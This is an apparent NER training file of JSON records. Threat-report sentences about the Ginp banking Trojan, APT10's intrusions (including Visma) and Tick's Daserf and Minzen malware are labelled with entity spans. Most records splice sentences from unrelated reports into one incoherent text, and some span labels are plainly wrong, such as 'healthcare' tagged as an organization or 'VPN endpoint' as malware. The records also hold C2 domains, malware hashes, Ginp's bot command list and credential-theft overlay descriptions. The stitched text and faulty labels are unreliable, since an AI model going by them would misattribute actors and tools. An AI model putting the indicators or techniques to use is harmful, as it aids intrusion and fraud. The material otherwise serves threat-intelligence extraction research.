Logs keystrokes and mouse movement Captures screenshots Opens cmd.exe shell Enumerates processes Executes programs Removes itself Enumerates all opening TCP and UDP ports .", "spans": [{"start": 143, "end": 148, "label": "Organization"}, {"start": 272, "end": 279, "label": "Indicator"}, {"start": 363, "end": 366, "label": "Indicator"}]} {"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . 9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 190, "end": 197, "label": "Organization"}, {"start": 200, "end": 209, "label": "Organization"}, {"start": 212, "end": 222, "label": "Organization"}, {"start": 225, "end": 239, "label": "Organization"}, {"start": 244, "end": 250, "label": "Organization"}, {"start": 257, "end": 261, "label": "Organization"}, {"start": 266, "end": 277, "label": "Organization"}, {"start": 297, "end": 304, "label": "Organization"}, {"start": 350, "end": 354, "label": "Malware"}, {"start": 460, "end": 478, "label": "Organization"}]} {"text": "In the second step it asks the victim for the Accessibility Service privilege as visible in following screenshot : Ginp Accessibility request Once the user grants the requested Accessibility Service privilege , Ginp starts by granting itself additional permissions , such as ( dynamic ) permissions required in order to be able to send messages and make calls , without requiring any further action from the victim . 
We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date . Interestingly , the C2 servers linking 9002 to Daserf were described in the report of an Adobe Flash Zero-day attack from FireEye in 2013 .", "spans": [{"start": 115, "end": 119, "label": "Malware"}, {"start": 211, "end": 215, "label": "Malware"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 554, "end": 556, "label": "System"}, {"start": 573, "end": 577, "label": "Malware"}, {"start": 581, "end": 587, "label": "Malware"}, {"start": 623, "end": 634, "label": "System"}, {"start": 635, "end": 643, "label": "Vulnerability"}, {"start": 656, "end": 663, "label": "Organization"}]} {"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks . In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd . These domains were registered through the privacy protection services in 2008 and 2011 .", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 168, "end": 191, "label": "Organization"}, {"start": 204, "end": 226, "label": "Organization"}]} {"text": "The commands supported by the most recent version of the bot are listed below . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": [{"start": 218, "end": 241, "label": "Organization"}, {"start": 258, "end": 281, "label": "Indicator"}, {"start": 282, "end": 304, "label": "Indicator"}]} {"text": "As can be observed , the possibilities offered by the bot are pretty common . 
Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 . Though we don\u2019t know the targets of these malware samples at the time of writing this article , we suspect the same group is behind these threats for a number of reasons .", "spans": [{"start": 116, "end": 131, "label": "Organization"}, {"start": 199, "end": 206, "label": "Organization"}, {"start": 253, "end": 257, "label": "Organization"}]} {"text": "Command Description SEND_SMS Send an SMS from the bot to a specific number NEW_URL Update the C2 URL KILL Disable the bot PING_DELAY Update interval between each ping request CLEAN_IGNORE_PKG Empty list of overlayed apps WRITE_INJECTS Update target list READ_INJECTS Get current target list START_ADMIN Request Device Admin privileges ALL_SMS Get all SMS messages DISABLE_ACCESSIBILITY Stop preventing user from disabling the accessibility service ENABLE_ACCESSIBILITY Prevent user from disabling Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . 
The samples of Daserf that shared infrastructure were submitted to VirusTotal only from Japan multiple times in 2013 .", "spans": [{"start": 570, "end": 573, "label": "Organization"}, {"start": 704, "end": 710, "label": "Malware"}, {"start": 756, "end": 766, "label": "Organization"}]} {"text": "the accessibility service ENABLE_HIDDEN_SMS Set malware as default SMS app DISABLE_HIDDEN_SMS Remove malware as default SMS app ENABLE_EXTENDED_INJECT Enable overlay attacks DISABLE_EXTENDED_INJECT Disable overlay attacks ENABLE_CC_GRABBER Enable the Google Play overlay DISABLE_CC_GRABBER Disable the Google Play overlay START_DEBUG Enable debugging GET_LOGCAT Get logs from the device STOP_DEBUG Disable debugging GET_APPS The December APT10 indictment noted that the group\u2019s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States . 
As noted in a later section , another Invader sample shared different C2 servers with Daserf .", "spans": [{"start": 251, "end": 262, "label": "System"}, {"start": 302, "end": 313, "label": "System"}, {"start": 438, "end": 443, "label": "Organization"}, {"start": 784, "end": 791, "label": "Malware"}, {"start": 816, "end": 818, "label": "System"}, {"start": 832, "end": 838, "label": "Malware"}]} {"text": "Get installed applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , such as the use of overlay attacks , SMS control and contact In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": [{"start": 428, "end": 435, "label": "System"}, {"start": 540, "end": 545, "label": "Organization"}, {"start": 595, "end": 601, "label": "System"}, {"start": 606, "end": 613, "label": "System"}, {"start": 675, "end": 683, "label": "Organization"}, {"start": 698, "end": 702, "label": "Organization"}, {"start": 724, "end": 735, "label": "System"}, {"start": 740, "end": 756, "label": "System"}, {"start": 757, "end": 772, "label": "Vulnerability"}]} {"text": "list harvesting . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . 
SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in Japanese Software Asset Management system on endpoints .", "spans": [{"start": 47, "end": 56, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}, {"start": 236, "end": 272, "label": "Vulnerability"}]} {"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . Therefore , Tick or their digital quartermaster is capable of deploying new and unique exploits .", "spans": [{"start": 122, "end": 127, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 329, "end": 333, "label": "Organization"}]} {"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers\u2019 networks . 
In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": [{"start": 47, "end": 53, "label": "Malware"}, {"start": 123, "end": 129, "label": "System"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 310, "end": 320, "label": "Organization"}, {"start": 331, "end": 337, "label": "Organization"}, {"start": 496, "end": 510, "label": "Malware"}]} {"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The web server was also a C2 server for another threat , Minzen ( a.k.a , XXMM , Wali , or ShadowWali ) .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 508, "end": 519, "label": "Malware"}, {"start": 537, "end": 550, "label": "Malware"}, {"start": 553, "end": 568, "label": "Malware"}, {"start": 571, "end": 584, "label": "Malware"}, {"start": 589, "end": 605, "label": "Malware"}, {"start": 779, "end": 781, "label": "System"}, {"start": 810, "end": 816, "label": "Malware"}, {"start": 827, "end": 831, "label": "Malware"}, {"start": 834, "end": 838, "label": "Malware"}, {"start": 844, "end": 854, "label": "Malware"}]} {"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan . 
During this operation (dubbed \u2018Cloud Hopper\u201d because of the group\u2019s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": [{"start": 52, "end": 56, "label": "Malware"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 256, "end": 267, "label": "System"}, {"start": 270, "end": 279, "label": "System"}, {"start": 282, "end": 291, "label": "System"}, {"start": 294, "end": 300, "label": "System"}]} {"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 147, "end": 162, "label": "Organization"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 376, "end": 382, "label": "Malware"}]} {"text": "It enables the bot to stream screenshots and send them to the C2 so that actors can see what is happening on the screen of the infected device . This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China\u2019s civilian human intelligence agency . 
One of the Minzen samples ( SHA256 : 9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 ) found in the Republic of Korea in December 2016 installs simple backdoor module as a final payload on a compromised computer .", "spans": [{"start": 190, "end": 195, "label": "Organization"}, {"start": 353, "end": 359, "label": "Malware"}, {"start": 379, "end": 443, "label": "Indicator"}]} {"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . It opens a TCP port and receives commands from a remote attacker .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 223, "end": 226, "label": "Indicator"}]} {"text": "If the package name of the foreground app is included in the target list , an overlay is shown . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . According to the debug path in the body , the author of the tool called it \u201c NamelessHdoor , \u201d and its internal version is identified as \u201c V1.5. \u201d", "spans": [{"start": 97, "end": 112, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 387, "end": 400, "label": "Malware"}]} {"text": "The WebView-based overlay is loading an HTML page provided by the C2 in response to the package name provided by the bot . We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks . 
The payload is based on \u201c Nameless Backdoor \u201d which has been publicly available for more than ten years .", "spans": [{"start": 246, "end": 251, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 344, "end": 361, "label": "Malware"}]} {"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim \u2019 s login credentials , then stealing the credit card details ( to \u201c validate \u201d the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks . Recorded Future\u2019s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group\u2019s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . The oldest code we could identify was hosted on a famous Chinese source code sharing site since 2005 .", "spans": [{"start": 21, "end": 25, "label": "Malware"}, {"start": 504, "end": 521, "label": "Organization"}, {"start": 632, "end": 636, "label": "Organization"}, {"start": 657, "end": 681, "label": "Organization"}]} {"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . 
The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions , and added open-source DLL injection code from ReflectiveDLLLoader .", "spans": [{"start": 31, "end": 35, "label": "Malware"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 343, "end": 360, "label": "Malware"}, {"start": 412, "end": 429, "label": "Malware"}, {"start": 488, "end": 491, "label": "System"}, {"start": 512, "end": 531, "label": "System"}]} {"text": "Still included in the last versions , this screen is only used to overlay the official Google Play Store app . This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . There is minimal public information regarding the Nameless Backdoor , except for the interesting report from Cyphort in 2015 .", "spans": [{"start": 87, "end": 104, "label": "System"}, {"start": 221, "end": 236, "label": "System"}, {"start": 324, "end": 341, "label": "Malware"}, {"start": 383, "end": 390, "label": "Organization"}]} {"text": "More apps could be added to the grabber target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . 
The researcher of the company analyzed multiple threats , including Invader , Nioupale (Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": [{"start": 124, "end": 132, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 148, "end": 155, "label": "System"}, {"start": 156, "end": 162, "label": "System"}, {"start": 163, "end": 172, "label": "System"}, {"start": 173, "end": 181, "label": "System"}, {"start": 182, "end": 187, "label": "System"}, {"start": 261, "end": 265, "label": "Malware"}, {"start": 408, "end": 413, "label": "Organization"}, {"start": 455, "end": 464, "label": "System"}, {"start": 682, "end": 689, "label": "Malware"}, {"start": 692, "end": 700, "label": "Malware"}, {"start": 715, "end": 720, "label": "Malware"}]} {"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . 
We examined the sample described in the report as Hdoor and found it \u2019s a previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": [{"start": 107, "end": 111, "label": "Malware"}, {"start": 169, "end": 175, "label": "Malware"}, {"start": 185, "end": 191, "label": "Malware"}, {"start": 279, "end": 285, "label": "Malware"}, {"start": 307, "end": 313, "label": "Malware"}, {"start": 333, "end": 342, "label": "Malware"}, {"start": 374, "end": 389, "label": "Malware"}, {"start": 421, "end": 429, "label": "Malware"}, {"start": 602, "end": 607, "label": "Malware"}, {"start": 650, "end": 663, "label": "Malware"}, {"start": 725, "end": 728, "label": "System"}]} {"text": "When analyzing the Ginp \u2019 s recent samples , ThreatFabric analysts found some similarities with the famous Android banking Trojan . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . It turned out that the DLL files we found are a custom variant of Gh0st RAT , and the EXE files download the RAT .", "spans": [{"start": 19, "end": 23, "label": "Malware"}, {"start": 45, "end": 57, "label": "System"}, {"start": 136, "end": 154, "label": "Malware"}, {"start": 203, "end": 212, "label": "Malware"}, {"start": 269, "end": 272, "label": "System"}, {"start": 312, "end": 321, "label": "Malware"}]} {"text": "Based on the evolution of Ginp it is clear that it isn \u2019 t based on Anubis , but rather reuses some of its code . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . 
Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": [{"start": 26, "end": 30, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 145, "label": "System"}, {"start": 316, "end": 325, "label": "Malware"}]} {"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix.co.kr was registered in 2014 .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 140, "end": 147, "label": "System"}, {"start": 173, "end": 186, "label": "Indicator"}]} {"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . 
One of subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 94, "end": 100, "label": "Malware"}, {"start": 216, "end": 222, "label": "System"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 475, "end": 480, "label": "System"}, {"start": 496, "end": 507, "label": "System"}, {"start": 530, "end": 548, "label": "Indicator"}, {"start": 557, "end": 559, "label": "System"}, {"start": 570, "end": 576, "label": "Malware"}, {"start": 579, "end": 643, "label": "Indicator"}]} {"text": "Previous versions were storing config values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . 
Another subdomain , bbs.softfix.co.kr was hosted on same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": [{"start": 186, "end": 192, "label": "System"}, {"start": 262, "end": 266, "label": "Malware"}, {"start": 437, "end": 443, "label": "Organization"}, {"start": 461, "end": 468, "label": "System"}, {"start": 492, "end": 501, "label": "Organization"}, {"start": 606, "end": 623, "label": "Indicator"}, {"start": 657, "end": 673, "label": "Indicator"}, {"start": 702, "end": 704, "label": "System"}, {"start": 715, "end": 722, "label": "Malware"}, {"start": 726, "end": 733, "label": "Organization"}]} {"text": "In a 5-month timespan , actor managed to create a Trojan from scratch which will presumably continue evolving offering new features such as keylogging , back-connect proxy or RAT capabilities . They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law . We also identified www.gokickes.com was the C2 of another Invader variant ( 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb ) .", "spans": [{"start": 194, "end": 198, "label": "Organization"}, {"start": 347, "end": 363, "label": "Indicator"}, {"start": 372, "end": 374, "label": "System"}, {"start": 386, "end": 401, "label": "Malware"}, {"start": 404, "end": 468, "label": "Indicator"}]} {"text": "Ginp \u2019 s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank . Rapid7\u2019s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 . 
In addition to the infrastructure , the attacker also shared code .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}]} {"text": "The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language . In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop . The Gh0st downloaders employ simple substitution ciphers for hiding strings .", "spans": [{"start": 243, "end": 249, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 286, "end": 292, "label": "System"}, {"start": 368, "end": 373, "label": "Malware"}]} {"text": "Although the current target list is limited to Spanish apps , it seems that the actor is taking into account that the bot should also be able to target other countries , seeing that the path used in the inject requests contains the country code of the targeted institution . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . 
We also identified another malware family , HomamDownloader , sharing some servers with Daserf .", "spans": [{"start": 341, "end": 346, "label": "System"}, {"start": 403, "end": 408, "label": "Organization"}, {"start": 444, "end": 449, "label": "System"}, {"start": 452, "end": 458, "label": "System"}, {"start": 461, "end": 467, "label": "System"}, {"start": 470, "end": 475, "label": "System"}, {"start": 478, "end": 484, "label": "System"}, {"start": 531, "end": 546, "label": "Malware"}, {"start": 575, "end": 581, "label": "Malware"}]} {"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . An overview of the connections among these threats is discussed in below .", "spans": [{"start": 150, "end": 156, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 344, "end": 348, "label": "Malware"}]} {"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 . 
HomamDownloader is a small downloader program with minimal interesting characteristics from a technical point of view .", "spans": [{"start": 36, "end": 40, "label": "Malware"}, {"start": 104, "end": 127, "label": "System"}, {"start": 128, "end": 144, "label": "Indicator"}, {"start": 145, "end": 209, "label": "Indicator"}, {"start": 210, "end": 233, "label": "System"}, {"start": 234, "end": 251, "label": "System"}, {"start": 252, "end": 316, "label": "Indicator"}, {"start": 317, "end": 335, "label": "System"}, {"start": 336, "end": 357, "label": "Indicator"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 393, "end": 401, "label": "System"}, {"start": 417, "end": 438, "label": "Organization"}, {"start": 454, "end": 469, "label": "Malware"}]} {"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c APT10 actors gained initial access to the Visma network around August 17 , 2018 . 
HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 83, "label": "System"}, {"start": 84, "end": 105, "label": "Indicator"}, {"start": 106, "end": 170, "label": "Indicator"}, {"start": 171, "end": 189, "label": "System"}, {"start": 190, "end": 210, "label": "Indicator"}, {"start": 211, "end": 275, "label": "Indicator"}, {"start": 276, "end": 281, "label": "Organization"}, {"start": 318, "end": 331, "label": "System"}, {"start": 358, "end": 373, "label": "Malware"}, {"start": 408, "end": 412, "label": "Organization"}, {"start": 433, "end": 438, "label": "System"}]} {"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . The adversary crafted credible email and attachment after understanding the targets and their behavior .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 19, "end": 40, "label": "Indicator"}, {"start": 41, "end": 105, "label": "Indicator"}, {"start": 170, "end": 174, "label": "Malware"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 342, "end": 363, "label": "System"}, {"start": 484, "end": 489, "label": "System"}]} {"text": "This list is expected to grow in the future . 
Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . The email below was sent from a personal email account with a subject line of \u201c New Year Wishes on January 1st \u201d .", "spans": [{"start": 46, "end": 58, "label": "Organization"}, {"start": 157, "end": 170, "label": "Malware"}, {"start": 201, "end": 213, "label": "Malware"}, {"start": 352, "end": 357, "label": "System"}, {"start": 389, "end": 394, "label": "System"}]} {"text": "Why Did Chinese Spyware Linger in U.S . After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE . The message asked the recipient to rename the attachment extension from \u201c ._X_ \u201d to \u201c .exe \u201d and opening it with the password specified in the email to view the Happy New Year eCard in the correct and polite language .", "spans": [{"start": 87, "end": 92, "label": "Organization"}, {"start": 234, "end": 243, "label": "System"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 396, "end": 400, "label": "Indicator"}, {"start": 453, "end": 458, "label": "System"}]} {"text": "Phones ? This means that APT10 actors had two separate access points into the Visma network . 
In addition to the social engineering email technique , the attacker also employs a trick to the attachment .", "spans": [{"start": 25, "end": 30, "label": "Organization"}, {"start": 78, "end": 91, "label": "System"}, {"start": 132, "end": 137, "label": "System"}]} {"text": "November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . The actor embedded malicious code to a resource section of the legitimate SFX file created by a file encryption tool , and modified the entry point of the program for jumping to the malicious code soon after the SFX program starts .", "spans": [{"start": 90, "end": 97, "label": "System"}, {"start": 354, "end": 359, "label": "Organization"}]} {"text": "The New York Times reported on Nov. 15 that Kryptowire , a mobile enterprise security company , discovered the code on a lower-end smartphone made by BLU Products of Doral , Fla . Other examples of malicious infrastructure registered with internet.bs include domains for APT28\u2019s VPNFilter malware campaign and the registration of the cyber-berkut . 
The malicious code drops HomamDownloader , then jumps back to the regular flow in the CODE section , which in turn asks the user the password and decrypts the file .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 44, "end": 54, "label": "Organization"}, {"start": 150, "end": 153, "label": "Organization"}, {"start": 271, "end": 278, "label": "Organization"}, {"start": 279, "end": 288, "label": "System"}, {"start": 334, "end": 346, "label": "System"}, {"start": 374, "end": 389, "label": "Malware"}]} {"text": "The phones are sold at Best Buy and Amazon.com , among other retail outlets . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . Therefore , once a user executes the attachment and sees the password dialog on SFX , the downloader dropped by the malicious code starts working even if the user chooses the Cancel on the password window .", "spans": [{"start": 23, "end": 31, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 180, "end": 191, "label": "Organization"}]} {"text": "Kryptowire says the code , which it found on a BLU R1 HD devices , transmitted fine-grained location information and allowed for the remote installation of other apps . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . Should the user become aware of the infection later , it may be difficult to find the cause due to the fact that the original embedded file contained within the SFX is benign .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 47, "end": 50, "label": "Organization"}, {"start": 169, "end": 174, "label": "Malware"}, {"start": 180, "end": 195, "label": "System"}, {"start": 260, "end": 268, "label": "Organization"}]} {"text": "Text message and call logs were transmitted every 72 hours to the Shanghai server , and once a day for other personally identifiable data , the company says . 
In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . Tick was spotted last year , but they are actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": [{"start": 175, "end": 181, "label": "Organization"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 219, "end": 234, "label": "Organization"}, {"start": 305, "end": 313, "label": "Organization"}, {"start": 323, "end": 327, "label": "Organization"}]} {"text": "It turns out , however , that other security researchers noticed suspicious and faulty code on BLU devices as early as March 2015 , and it has taken nearly that long to remove it from the company 's devices . The attacker gained access to the victim\u2019s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . While some of the group \u2019s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": [{"start": 95, "end": 98, "label": "Organization"}, {"start": 213, "end": 221, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}]} {"text": "The finding , in part , shows the risk that can come in opting for less expensive smartphones , whose manufacturers may not diligently fix security vulnerabilities . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . 
